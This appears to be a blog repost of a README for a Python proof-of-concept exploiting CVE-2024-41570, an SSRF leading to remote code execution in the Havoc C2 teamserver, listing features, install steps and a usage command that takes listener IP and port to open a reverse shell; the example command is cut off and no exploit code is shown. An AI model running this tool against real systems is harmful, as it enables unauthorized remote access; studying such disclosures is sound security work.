API Security Blog

Exploit for Server-Side Request Forgery in Havocframework Havoc

CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

Features

- Registers an agent to the target service.
- Opens a WebSocket and sends handshake and authentication payloads.
- Executes commands remotely via a reverse shell.
- Provides a guided workflow with clear instructions.

Prerequisites

- Python 3.x installed on your machine.
- Install required dependencies by running:

```bash
pip install -r requirements.txt
```

Installation

1. Clone this repository:

```bash
git clone https://github.com/<your-repo-name>.git
```

2. Navigate to the project directory:

```bash
cd CVE-2024-41570
```

3. Install dependencies:

```bash
pip install -r requirements.txt
```

Usage

Run the script with the required arguments:

```bash
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
```

Arguments

- -t: Target URL of the WebSocket server.
- -i: IP address of the Team Server from Havoc.
- -p: Port for the Team Server from Havoc.
- -U: Username for WebSocket authentication.
- -P: Password for WebSocket authentication.
- -l: Listener IP for the reverse shell (your machine).
- -L: Listener port for the reverse shell (your machine).

Example Command

```bash
python3 exploit.py -t…
```
